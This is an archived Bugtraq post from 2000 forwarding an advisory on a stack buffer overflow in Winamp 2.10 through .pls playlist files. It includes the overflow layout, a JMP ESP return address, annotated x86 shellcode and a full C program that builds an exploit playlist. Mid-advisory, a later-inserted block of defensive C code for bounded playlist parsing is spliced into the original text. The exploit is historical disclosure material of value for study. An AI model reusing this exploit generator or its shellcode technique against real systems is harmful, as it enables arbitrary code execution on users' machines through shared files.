Bugtraq Archives: Buffer overflow with WinAmp 2.10

Subject: Buffer overflow with WinAmp 2.10
From: Transfer Interrupted (t-iGMX.NET)
Date: Sun Jan 09 2000 - 04:21:31 CST


Hi!
There's a stack based buffer overflow in WinAmp 2.10 (Win 98) which allows a user to
execute arbitrary code. Here's the source code and some better intro!

Be careful,

Transfer Interrupted

--
"This vulnerability is completely theoretical!"
-Microsoft

Nullsoft Winamp 2.10 buffer overflow advisory
Author: Steve Fewer, darkplanoceanfree.net http://indigo.ie/~lmf

Introduction:

I recently uncovered a stack based buffer overflow in winamp version 2.10 which lets me execute 'arbitrary code'. It is carried out through .pls files, which winamp uses for playlists. This is unnerving, as it is a feasible plan to trade playlists on irc during an mp3 trading session with someone.

The overflow occurs when an entry greater than 580 bytes is read in from a .pls file. EIP is the only register overwritten, by the four bytes that follow the 580; everything after that is space for your shell code, e.g.

    [playlist]
    File1=<580 bytes><eip><shell code>
    NumberOfEntries=1

The first 580 bytes get mangled around in memory, but the 585th byte (where our shell code starts) is pointed to by ESP, therefore a simple 'JMP ESP' or the like will land us back in our shell code. I used a 'JMP ESP' at address 0xBFB9CFF7 in comctl32.dll, which winamp loads. Pointing our EIP at that address lands us back where we want to be.

This was all created/tested on Windows 98 [Version 4.10.1998] running on an Intel PII400 with 128MB RAM.
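As an added example, not part of the advisory or of Winamp's code: the fix for a bug of this shape is a reader that knows the length of a File<n>= value before it touches a fixed-size buffer, and rejects anything that would not fit. The C below implements that bounded reader and a scan that reports how many entries exceed the 580-byte figure the advisory gives, which is also a quick way to triage a suspicious playlist. The struct, function names and the two sample playlists are constructed for this example; the 580-byte constant is taken from the advisory.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* The advisory's figure: a File<n>= value of 580 bytes or more overruns the
 * fixed stack buffer in Winamp 2.10. A hardened reader checks against this
 * before copying; using it as the buffer size is an assumption here. */
#define PLS_ENTRY_MAX 580

/* Summary of one playlist scan. */
struct pls_report {
    int entries;      /* File<n>= lines seen */
    int oversized;    /* entries rejected because they would not fit */
    size_t longest;   /* length of the longest File<n>= value */
};

/* Recognises "File<digits>=" at the start of a line of `len` bytes and
 * stores the offset of the value; returns 1 on match, 0 otherwise. */
static int parse_file_entry(const char *line, size_t len, size_t *value_off)
{
    size_t i = 4;
    if (len < 6 || memcmp(line, "File", 4) != 0) return 0;
    if (!isdigit((unsigned char)line[i])) return 0;
    while (i < len && isdigit((unsigned char)line[i])) i++;
    if (i >= len || line[i] != '=') return 0;
    *value_off = i + 1;
    return 1;
}

/* The check the vulnerable reader lacked: copy only if the value plus its
 * terminator fits the fixed buffer. Returns 0 on success, -1 if rejected. */
int copy_entry_bounded(char dst[PLS_ENTRY_MAX], const char *value, size_t len)
{
    if (len >= PLS_ENTRY_MAX) return -1;
    memcpy(dst, value, len);
    dst[len] = '\0';
    return 0;
}

/* Walks the playlist text line by line (LF or CRLF), measuring each line in
 * place rather than copying it into a fixed buffer, and fills the report. */
struct pls_report scan_playlist(const char *text)
{
    struct pls_report r = {0, 0, 0};
    char dst[PLS_ENTRY_MAX];
    const char *line = text;
    while (*line) {
        size_t len = strcspn(line, "\r\n");
        size_t off;
        if (parse_file_entry(line, len, &off)) {
            size_t vlen = len - off;
            r.entries++;
            if (vlen > r.longest) r.longest = vlen;
            if (copy_entry_bounded(dst, line + off, vlen) != 0) r.oversized++;
        }
        line += len;
        while (*line == '\r' || *line == '\n') line++;
    }
    return r;
}

/* Constructed sample input (not from the advisory). */
static const char BENIGN_PLS[] =
    "[playlist]\r\n"
    "File1=C:\\Music\\track01.mp3\r\n"
    "File2=C:\\Music\\track02.mp3\r\n"
    "NumberOfEntries=2\r\n";

/* Builds a constructed test playlist whose File1 value is n filler bytes
 * ('A'), to exercise the length check; returns NULL if buf cannot hold it. */
char *build_long_entry_playlist(char *buf, size_t cap, size_t n)
{
    const char *head = "[playlist]\nFile1=";
    const char *tail = "\nNumberOfEntries=1\n";
    size_t hlen = strlen(head);
    if (cap < hlen + n + strlen(tail) + 1) return NULL;
    memcpy(buf, head, hlen);
    memset(buf + hlen, 'A', n);
    strcpy(buf + hlen + n, tail);
    return buf;
}

int main(void)
{
    char buf[2048];
    struct pls_report a = scan_playlist(BENIGN_PLS);
    struct pls_report b = scan_playlist(build_long_entry_playlist(buf, sizeof buf, 600));
    printf("benign: %d entries, longest %zu, rejected %d\n", a.entries, a.longest, a.oversized);
    printf("600-byte entry: %d entries, longest %zu, rejected %d\n", b.entries, b.longest, b.oversized);
    return 0;
}
```

The reader rejects an over-long entry outright rather than truncating it silently: a truncated path would still play nothing, and a playlist carrying a 600-byte "filename" is worth flagging, not quietly repairing. The same scan_playlist report can be run over playlists received from untrusted sources before they are opened in a vulnerable player.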

The Shell Code:

The shell code I wrote for this simply displays a message box and then calls exit(). However, Winamp doesn't load msvcrt.dll, which is needed to call exit(), so we have to load it ourselves. I used the address 0xBFF776D4 in kernel32.dll (v4.10.1998) for LoadLibraryA(). For calling MessageBox I used the address 0xBFF5412E in user32.dll (v4.10.1998), and for calling exit() I used the address 0x78005504 in msvcrt.dll (v6.00.8397.0). It didn't warrant using GetProcAddress for compatibility's sake. For the opcodes see the exploit further on.

    // This loads msvcrt.dll
    push ebp
    mov ebp,esp
    xor eax,eax
    push eax
    push eax
    push eax
    mov byte ptr[ebp-0Ch],4Dh      // build "MSVCRT.DLL" on the stack, NUL-terminated by the pushes
    mov byte ptr[ebp-0Bh],53h
    mov byte ptr[ebp-0Ah],56h
    mov byte ptr[ebp-09h],43h
    mov byte ptr[ebp-08h],52h
    mov byte ptr[ebp-07h],54h
    mov byte ptr[ebp-06h],2Eh
    mov byte ptr[ebp-05h],44h
    mov byte ptr[ebp-04h],4Ch
    mov byte ptr[ebp-03h],4Ch
    mov edx,0xBFF776D4             // LoadLibraryA in kernel32.dll (v4.10.1998)
    push edx
    lea eax,[ebp-0Ch]
    push eax
    call dword ptr[ebp-10h]
    // This calls MessageBox to say 'Hi!'
    push ebp
    mov ebp,esp
    xor edi,edi
    push edi
    mov byte ptr[ebp-04h],48h      // build "Hi!" on the stack
    mov byte ptr[ebp-03h],69h
    mov byte ptr[ebp-02h],21h
    mov edx, 0xBFF5412E            // MessageBoxA in user32.dll (v4.10.1998)
    push edx
    push edi
    lea edx,[ebp-04h]
    push edx
    push edx
    push edi
    call dword ptr[ebp-08h]
    // This calls exit()
    push ebp
    mov ebp,esp
    mov edx,0xFFFFFFFF
    sub edx,0x87FFAAFB             // = 0x78005504, exit() in msvcrt.dll (v6.00.8397.0)
    push edx
    xor eax,eax
    push eax
    call dword ptr[ebp-04h]

The Exploit:

<-snip->

/* Stack based buffer overflow exploit for Winamp v2.10
 * Author Steve Fewer, 04-01-2k. Mail me at darkplanoceanfree.net
 *
 * For a detailed description on the exploit see my advisory.
 *
 * Tested with Winamp v2.10 using Windows98 on an Intel
 * PII 400 with 128MB RAM
 *
 * http://indigo.ie/~lmf
 */

#include <stdio.h>

int main()
{
    printf("\n\n\t\t.......................................\n");
    printf("\t\t......Nullsoft Winamp 2.10 exploit.....\n");
    printf("\t\t.......................................\n");
    printf("\t\t.....Author: Steve Fewer, 04-01-2k.....\n");
    printf("\t\t.........http://indigo.ie/~lmf.........\n");
    printf("\t\t.......................................\n\n");

    char buffer[640];
    /* 0xBFB9CFF7, the 'JMP ESP' in comctl32.dll, written little-endian */
    char eip[8] = "\xF7\xCF\xB9\xBF";
    /* The shell code listed above: load msvcrt.dll, MessageBox "Hi!", exit() */
    char sploit[256] =
        "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
        "\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"
        "\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA\xD4\x76\xF7\xbF\x52\x8D\x45\xF4\x50"
        "\xFF\x55\xF0\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x48\xC6\x45\xFD\x69\xC6\x45\xFE\x21"
        "\xBA\x2E\x41\xF5\xBF\x52\x57\x8D\x55\xFC\x52\x52\x57\xFF\x55\xF8\x55\x8B\xEC\xBA\xFF"
        "\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";

    FILE *file;

    /* 580-byte NOP sled; terminated so that "%s" writes exactly 580 bytes */
    for(int x=0;x<580;x++)
    {
        buffer[x] = 0x90;
    }
    buffer[580] = '\0';

    file = fopen("crAsh.pls","wb");
    if(file == NULL)
    {
        printf("\t could not create crAsh.pls\n");
        return 1;
    }

    fprintf(file, "[playlist]\n");
    fprintf(file, "File1=");
    fprintf(file, "%s", buffer);
    fprintf(file, "%s", eip);
    fprintf(file, "%s", sploit);
    fprintf(file, "\nNumberOfEntries=1");

    fclose(file);
    printf("\t     created file crAsh.pls loaded with the exploit.\n");
    return 0;
}

<-snip->

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=




This archive was generated by hypermail 2b27 : Mon Jan 10 2000 - 18:52:02 CST